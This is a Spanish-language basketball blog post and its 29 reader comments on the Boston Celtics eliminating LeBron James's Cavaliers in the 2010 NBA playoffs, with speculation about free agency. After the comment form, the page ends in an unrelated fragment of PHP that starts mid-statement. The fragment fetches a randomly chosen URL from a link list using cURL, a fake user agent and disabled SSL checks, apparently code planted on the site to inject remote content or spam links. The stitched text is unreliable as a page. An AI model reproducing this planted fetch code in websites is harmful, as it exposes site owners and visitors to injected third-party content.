Playoffs 13/05/2010: A la boca del lobo

14 de May de 2010 por TheDeerHunter

El peor lugar del mundo para jugar a vida o muerte un partido decisivo. El espíritu del vetusto Garden de Boston ahora remodelado y moderno, con siglas corporativas incorporadas al sagrado nombre. La trituradora de sueños que antes doblegó a Chamberlain, West, Baylor, Moses, Kareem, Magic, Jordan y Kobe.

Muchos creyeron en algún momento que LeBron era el Elegido para romper todos estos límites. El Nexus-6, la máquina más perfecta para desarrollar este deporte y que todo lo demás es psicológico, mitológico, abono del terreno de lo supersticioso y de los cuentos del “abuelo cebolleta”. Sin embargo anoche, una vez más, se impuso el peso de la historia. No subestimes jamás el corazón de un equipo campeón. En este caso, el más campeón de todos. Si el hincar la rodilla en Boston es requisito para alcanzar la grandeza, King James lo ha logrado ya por partida doble. En esta ocasión era él el favorito.

Por segundo año consecutivo los Cavs se quedan fuera habiendo sido los mejores de largo en la regular. No se pueden quejar de la actuación del líder, que vendió cara su piel intentando emular la barbaridad de Rondo en el cuarto choque. Fue el mejor en todo. Se cargó al equipo a la espalda llegando a amenazar el resultado él sólo. Triple doble brutal que bien pudo ser cuádruple… aunque en este caso la cuarta categoría estadística eran las pérdidas de balón. Por ahí se empezó a escapar la eliminatoria.

Sin embargo, con el juego caótico de anoche y el intento desesperado de ganar la guerra cada cual por su cuenta, quedaron en evidencia nuestras peores sospechas con respecto a Mike Brown. El baño táctico que le ha pegado Doc Rivers durante toda la serie debería pasar a la historia y estudiarse en los libros. El mérito de Brown ha llegado a ser hacer de los Cavs un equipo rocoso defensivamente, pero el resto de aspectos quedan hasta el exceso en manos del “predilecto”. Todo lo que rodea a LeBron es gris, sin matices ni alternativas. Florece él y todo lo demás se marchita a su sombra, como le ha ocurrido a Antawn Jamison esta fatídica serie. La piedra filosofal llamada a ser el anti-Lewis, recurso con el que Van Gundy le comió el año pasado la tostada. Nos quedamos con las ganas de saber si realmente lo hubiera sido, porque a Brown no se le ha ocurrido otro rol distinto para el excelente ala-pívot.

Los Celtics se limitaron a permitir a sus rivales que se auto-fagocitaran. Simplemente se plantaron bien, se esforzaron por ejecutar con intensidad los algoritmos defensivos de Rivers y asistieron a un recital de pérdidas y de mandarinas contra su aro. Anoche fueron ellos los que corrieron como demonios los contraataques, como un cruel espejo del aspecto más letal de los Cavaliers. Los protagonistas cambiaron nuevamente. Rondo y Garnett como líderes, un impresionante trabajo ofensivo y defensivo de Tony Allen e incluso de Rasheed. Allen y Pierce se encargaron de un trabajo más oscuro, por esta vez.

Tan sólo añadir, para los que tenían a los Celtics como una banda de acabados, que el Rondo-Allen-Pierce-Garnett-Perkins es el mejor quinteto de la liga este mismo año (en temporada regular) con el dato “plus/minus” en la mano. No lo habían sido en playoffs hasta anoche, donde lo volvieron a ser brillando especialmente en defensa. Esto demuestra que a menudo algunas sensaciones nos enturbian el buen juicio. Aviso para los navegantes.

Y MAÑANA…

Descanso para todos y hasta el domingo nada de nada.

Comenta

29 comentarios a esta entrada

  1. Fer dice:
    #1

    Buenas a todos,
    esto creo que significa el fin de Lebron en Cleveland. Empiezo a hacer cábalas y lo que puede pasar en verano es flipante:
    ¿os imagináis a mis Lakers con Felton (MLE), Kobe, Lebron, Odom, Gasol de titulares, saliendo desde el banco Fisher, Vujacic, Artest, y si se pueden añadir por el mínimo de un veterano gente como Kurt Thomas o la vuelta de Shaq a LA?
    ¿O a los Bulls con Rose, JoJo, Lebron, Gibson, Noah, usando bien luego la MLE y fichando por el mínimo a buenos veteranos?
    Menudo veranito nos espera!!!!

      Citar

  2. TheDeerHunter dice:
    #2

    difícilmente me puedo imaginar a LeBron en L.A. ya que es materialmente imposible.

      Citar

  3. sergio dice:
    #3

    Yo era el primer ciego que nunca se acuerda de que los Playoffs son otro cantar, que los LeBron/Roy-sistemas nunca dan títulos y que nunca hay que dar por muertos a unos recientes campeones (podeis preguntarle tambien a Nowitzki).

    Muchas son las claves que podriamos dar de esta serie:

    – El fichaje de Jamison se hizo pensando en Orlando, nunca en una hipotetica serie contra Boston. A pesar de que no puedo considerar que la culpa deba recaer sobre el, Garnett ha rejuvenecido al menos un par de añitos en sus duelos contra el ex Wizard. Ayer, Brown intento emparejar a Garnett con O’neal y le anotó cinco canastas sin fallo al principio del partido.
    – Mike Brown puede ser perfectamente, el entrenador menos adecuado para llevar un equipo a ser campeón. Cuando a tu equipo parece que “solo” le puede faltar trabajo defensivo en equipo y calma/confianza para afrontar partidos apretados… no es que seas un mal tecnico, eres el peor. Con los recursos que tenian para contrarrestar a los Celtics (no pasaba igual al contrario), como emparejar en algunos momentos a Garnett con Hickson y/o Varejao, poner a West con Rondo en la defensa,… (todo esto desde el ventajismo que da verlo a toro pasado) Empiezo a creer que los Cavs, ni necesitaban a Jamison ni a Shaq. Necesitaban otro entrenador.
    – La incapacidad de Mo para parar a Rondo comienza a ser de chiste. Tambien debemos loar la manera de ser determinante sin que nadie lo note del joven base verde.
    – Que tengas al mejor del mundo y que sea el mas completo no significa que juegue solo. Para un equipo como los Celtics, eso es lo mejor que les puede ocurrir: centrar su defensa en un jugador. Creo que es un problema del entrenador nuevamente. Nadie en los Cavs (excepto uno) conoce el rol que tiene en el equipo. Quizas si tuviese que compartir balon con otra superestrella….
    – Boston y Lakers son, actualmente, dos equipos que te puedes olvidar de lo que han hecho en la Regular durante todo el año. Los primeros perdieron contra Nets y Wizards en su campo tras el All-Star, y no tenian factor cancha ante los dos favoritos a llevarse el anillo. Los segundo se pueden dormir en temporada y en las eliminatorias cascarte un rosco en modo “recien despierto”.
    – Factor Tony Allen en esta serie. Gran defensa e intensidad al estilo Pietrus.. y encima que mate se cascó el tio… ponedlo por Dios!!!

    Por cierto…. Garnett, despues de sus constantes fracasos en Minnessota, no ha perdido una eliminatoria vistiendo de verde.

      Citar

  4. Fer dice:
    #4

    Yo no tengo tan claro que sea imposible… De hecho en los medios de allí dan a los Lakers como uno de los 5 máximos candidatos a hacerse con él. De todas formas, son sólo pajas mentales mías… Pero cambiando lo que dijiste ayer… acojonaría, tronco, acojonaría…

      Citar

  5. Love Denise dice:
    #5

    los Cavs se han suicidado, tampoco es que los Celtics estén para muchos trotes (ya me veo a la gente dandome palos, es mi opinion, algo totalmente subjetivo)

    no sé si será posible que lebron llegue a Lakers, pero juntar a Kobe y a Lebron y que no haya ego entre ellos, lo veo una tarea dificil, que acabaría perjudicando a todo el equipo.

      Citar

  6. sergio dice:
    #6

    A lo que se refiere Deer es que serian 3 contratos cercanos a los 20 millones. El limite salarial esta en 50 y algo millones… por lo que se me hace imposible mantener un equipo con 3 mastodontes de ese calibre… salvo que LeBron renuncie a su sueldo claro… que entonces si es posible 🙂 Y el año que viene tambien hay revision salarial, que puede derivar en un paron como el de la temporada 98-99.

      Citar

  7. Fer dice:
    #7

    Seguro que al amigo Buss no le importaría demasiado estar por encima del limite (muuuuuuy por encima, es verdad), ya que de pasar yo creo que habría una dinastía tipo Russell´s Celtics.
    Por otra parte, en Chicago tampoco pintaría mal, y allí sí sería la estrella absoluta, aunque no creo que hubiese problema entre Kobe y Lebron, yo creo que cada uno tendría su importancia, la que bajaría exponencialmente sería los “touches” de Gasol…

      Citar

  8. TheDeerHunter dice:
    #8

    Te recuerdo Fer que hay un límite salarial duro que no se puede traspasar por muchos deseos que tuvieramos todos de que Bush queme su dinero de esa manera.

    Si yo tuviera que fichar un superestrella ahora mismo… esperaría a Durant. Me da que le puede sentar bien el dorado y púrpura.

      Citar

  9. Fer dice:
    #9

    Lo sé Deer, pero si se hacen eco en la ESPN (creo) de que es posible, supongo que lo harán con conocimiento. La verdad es que a mí tbn me gusta más Durant que Lebron, a Lebron le falta el instinto asesino que tienen Kobe o que seguro que llega a tener Durant…
    De todas formas después de lo de ayer creo que este verano va a estar bastante más movidito de lo que se pensaba últimamente…

      Citar

  10. pcerezo dice:
    #10

    Primero inviable lo de James a Lakers además de innecesario. La competición no está creada para eso y los topes salariales se evitaron precisamente para juntar en un equipo tanta estrella. No entra dentro de un escenario racional ni creo que discutible.
    No tengo tan claro que LBJ vaya a deja Cleveland. Creo que con la salida de Ilgauskas y los 20 millones de Saq pueden hacer otro esfuerzo para traer a Bosh? y ojo seguro que buscar el entrenador correcto es la tarea más importante de Ferry.

    Pablo

      Citar

  11. pcerezo dice:
    #11

    Veo más factible lo de Durant tal y como apunta Deer pero cuando acaba contrato Durant? porque Kobe tienen cuatro años más.
    Por cierto yo estoy con Love Denise no tengo claro que esto haya sido más mérito de Celtics (tremendo Rivers, lo de Tony Allen en la serie de traca) como demérito de Cavs.

    Orlando-Lakers otra vez con factor de cancha cambiado.

      Citar

  12. Fer dice:
    #12

    pcerezo creo que es más dificil que los Cavs puedan firmar a otro FA además de Lebron que éste se vaya a los Lakers. A no ser que Shaq renueve por los Cavs por una burrada de millones y se vaya vía sign and trade a Toronto, o aunque ofreciese tbn otros jugadores, creo que Toronto puede sacar de otros equipos bastante más que de los Cavs

      Citar

  13. Vader dice:
    #13

    Hasta que no se demuestre lo contrario yo sigo pensando que Lebron seguira en Cleveland. Aunque esta claro que despues de este palo hacen falta algunos ajustes en ese equipo, llamase cambio de entrenador o cambio de jugadores. Yo optaria por lo primero porque un equipo con la plantilla actual de Cleveland deberia dar para mucho más. Jamison es un 20-10 toda su carrera, no puede ser que llegue a Cleveland y el equipo siga jugado exclusivamente para Lebron, han aprovechado más el fichaje de Shaq (cosa que me parece muy bien) que el de Jamison.

    Ojala me equivoque y Lebron finalmente fichará por los Knicks. No me cae muy bien el jugador pero lo recibiria con los brazos abiertos 🙂 Lebron + Bosh y volveriamos a estar en la pomada durante muchos años XD.

    Saludos

      Citar

  14. pcerezo dice:
    #14

    Recordemos que Bosh es AGENTE LIBRE SIN RESTRICCIONES Y NO TIENE PORQUE FIRMAR CON TORONTO. No veo a Shaq renovando y dudo que alguién en su estado actual (es una lástima como se arrastra) le dé más de 1 millón de doláres.
    Fer lo de Los Lakers suena a coña. Yo creo que si Lakers se meten en berenjenal irán a por Bosh (ahí si veo un trade&sign con Bynum). Me da que Lakers tienen plantilla (con la confirugación actual de los demás equipos) para llegar a finales de NBA por tres años más sin necesidad de Lebrones, Wade,…Lo que claramente necesita Lakers es cambiar la figura de Fisher (aparte de su influencia en banquillo), es decir, necesita un base no base para defender a Westbrook, Deron, Chris Paul, Parker, Nelson, Rondo en los próximos años. Por supuesto si pudieran encasquetar a Vujacic seguro que lo harían.

    Pablo

      Citar

  15. kantonyo dice:
    #15

    Se rumorea que el entrenador de los Cavs podría ser John Calipari, actual entrenador de Kentucky Wildcats y antiguo entrenador de Memphis Tigers donde salió Derrick Rose.

    Se habla de Chicago, pero creo que en Illinois se prefiere a Wade, al ser de alli. No creo tampoco que Chicago consiga traerse a ambos.

    Acaba contrato Miller (12M$), James (6,5M$), Thomas(6,5M$), Warrick (3M$), Alexander (2,5M$), Law(2M$) , Pargo (2M$): Total 34,5M$. Como moneda de cambio estaría Deng: 10M$. Total 44,5 M$. Incluso Hinrich (9M$) al llegar Wade se podría usar como moneda de cambio.

    Seria factible Wade-Lebron en Chicago????

      Citar

  16. LEmontus dice:
    #16

    Lebron seguro que no estará en Cavs lo cual creo que les conviene porque más equipo que este año dificil lo veo, las 9 perdidas de lebron acabaron 7 en contraataque y canasta.Me gustaría ver a mo y delonte tirando del carro la verdad.

    Alguien dijo que esta serie estaba tirada para cavs y hay que ser muy ingenuo para no saber que po es otra historia y mas si está de por medio rondo allen pierce garnet……

    Este conferencia es muy superior. De todas maneras lebron no ha estado bien más allá de su facilidad para hacer números.

    Orlando directo al título… y por cierto no se quien lo habrá dicho pero olvidarse de lebron en LA además la nba no lo aceptaría bien, la liga perdería mucha rivalidad.

      Citar

  17. Fer dice:
    #17

    Estoy de acuerdo contigo, Pablo, pero Bosh se va a ir de Toronto vía sign and trade sí o sí, para que los raptors reciban algo a cambio y él tenga el máximo contrato que se le puede ofrecer.
    Como base para los Lakers me traería con la MLE a Felton o a Blake, y habría que contratar a unos cuantos veteranos que quisieran venir por el mínimo para el banquillo, que es el punto débil de estos Lakers, más incluso que lo del base…
    Lo de Lebron sé que es muy dificil que ocurra, casi imposible, pero repito que en la ESPN lo dan como una posibilidad real.
    Yo a Lebron lo veo en Chicago vía sign and trade a cambio de Deng y algo más. De esta forma los Bulls podrían adquirir a otro top FA, creo que JoJo…

      Citar

  18. pcerezo dice:
    #18

    Lo de la ESPN con Lebron es como el Marca con los fichajes…llenar horas y horas y periódicos.

      Citar

  19. HeiNeKeN dice:
    #19

    me encanta… no soporto el bombo que se le da a LeBron, asi que otro añito mas haciendo “la risa” en playoffs y a casita antes de tiempo…

      Citar

  20. totadeum dice:
    #20

    Coincido con el análisis que hace Sergio en el 3er post.
    Creo que uno de los errores de los Cavs fue pensar directamente en la final con los Magic, Shaq para frenar a Howard, Jaminson para Lewis. Pienso como escuché por ahí, un gran equipo le ganó al mejor jugador.

      Citar

  21. sergio dice:
    #21

    Juntar a Rose, Wade y LeBron, teniendo un juego interior con Gibson y Noah, a mi entender, es pegarse un tiro en el pie. A mi, personalmente, me encanta Loul Deng. Un juego Rose, Wade, Deng, Gibson/otro y Noah me parece igualmente un grandísimo equipo.

    No entiendo porque iban a hacer un sign & trade con Bosh si no es porque Bosh quiera “dejarle” algo al equipo que lo seleccionó en el Draft.

    Yo no me traigo a Felton o a Blake ni loco vamos… Hay muchos bases por ahí rulando que podrían hacerlo igualmente bien. Y por soñar… me traigo a Nash vaya. Mucho antes que a LeBron sin lugar a dudas, y cobrando solo 10 millones la proxima temporada (alguien sabe porque el año que viene su sueldo es menor al de este?)

    Shaq no dijo que se retiraba este año?? No me parece un pivot titular ahora mismo, pero si podria ser de los mejores suplentes en su puesto. No creo que lo haya hecho mal en los minutos que ha estado en pista.

    Deer… llamarlo limite salarial duro a lo de la NBA es un poco ironico… hay muchas reglas para saltarse los limites, sobre todo comparado con las otras ligas mayores americanas. Seria un articulo interesante reunir todas esas reglas, poniendo ejemplos pasados y actuales para comprenderlo mejor. Creo que este año se hablara mucho de esos aspectos. ¿Quien se anima?

    Y por decir tonterias… ¿porque no regalan a Vujacic y Mbenga a Minnessota y se traen los derechos de Rubio?

      Citar

  22. Marcaco dice:
    #22

    Estoy contento. Es más, quiero que los celtics ganen a Orlando para ver otra final Lakers Celtics y ver como pirden estos verdes de pus. besos

      Citar

  23. M dice:
    #23

    ¿Qué ha pasado con Shaq, estaba lesionado?

      Citar

  24. sergio dice:
    #24

    Por cierto… a nadie se le ocurren los Nets? Nº1 del draft, Harris, Lopez, limite salarial (creo q es el equipo con menos millones asegurados), estadio nuevo, propietario con mucho dinero, nueva residencia en el Bronx (creo q era el Bronx..),… Sería toda una guarrada para los Knicks.

      Citar

  25. Vader dice:
    #25

    @sergio

    Creo que el plan de los Nets es irse a Brooklyn (creo que se escribe así…) aunque no se si ya es para la temporada siguiente. Sea como sea creo que los equipos más “apetecilbes” para los agentes libres este verano seran Chicago por temas de mercado y deportivos, New York por tema de mercado y tambien los Thunder por tema deportivo.

    Saludos

      Citar

  26. PIRATA dice:
    #26

    Es curioso que despues de los trades de febrero todo el mundo estaba de acuerdo en que los equipos más potentes eran cavs y mavs……nunca se sabe….

      Citar

  27. Txusma dice:
    #27

    A ver, lo de Lebron y los Lakers diría que es totalmente imposible a no ser que haya sign&trade de por medio. Es casi imposible que los Lakers puedan conseguir el espacio salarial suficiente para ofrecerle el máximo a Lebron así que olvidáis de Lebron si no quereis traspasar a Kobe, Gasol o Bynum+Odom…
    En lo de los Bulls yo apuesto más por Bosh incluso por Wade. La combinación Rose-Wade no la veo por ninguna parte y Bosh es justo lo que le falta al equipo.
    Y en los Cavs yo diriía que no hay para renovar a Lebron y traerse a otro mega crack sinó es mediante sign&trade. A no ser que primero fichen y luego renueven por alguna clausula especial para saltarse el límite.
    A ver si investigo un poco y presento un artículo con los diferentes equipos y sus opciones.

      Citar

  28. Toni dice:
    #28

    Pobre Lebron…
    Veo que ya calentais motores para el verano cumbre (o bluff porqe se queden todos en sus respectivos equipos), casualmente tenemos el ingrediente clave para que los cracks se movieran de equipo, todos estan fuera de la pomada por el título.
    Lo de Ricky por los Lakers estaría muy bien, la idea es muuy buena pero para decepcion de muchos los Wolves han estado cenando con los Rubio charlando sobre la incorporacion en 2011 y no creo que se desprendan del de Masnou.
    Si los Nets se van al Bronx y con la pasta del ruso fichan 2-3 secundarios y una estrella, acaban de hundir el Madison.

      Citar

  29. Carlos dice:
    #29

    Los Nets no van al Bronx, sino a Brooklyn, pero como mínimo hasta dentro de dos temporadas no se producirá la mudanza. Ahora están construyendo el nuevo pabellón.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>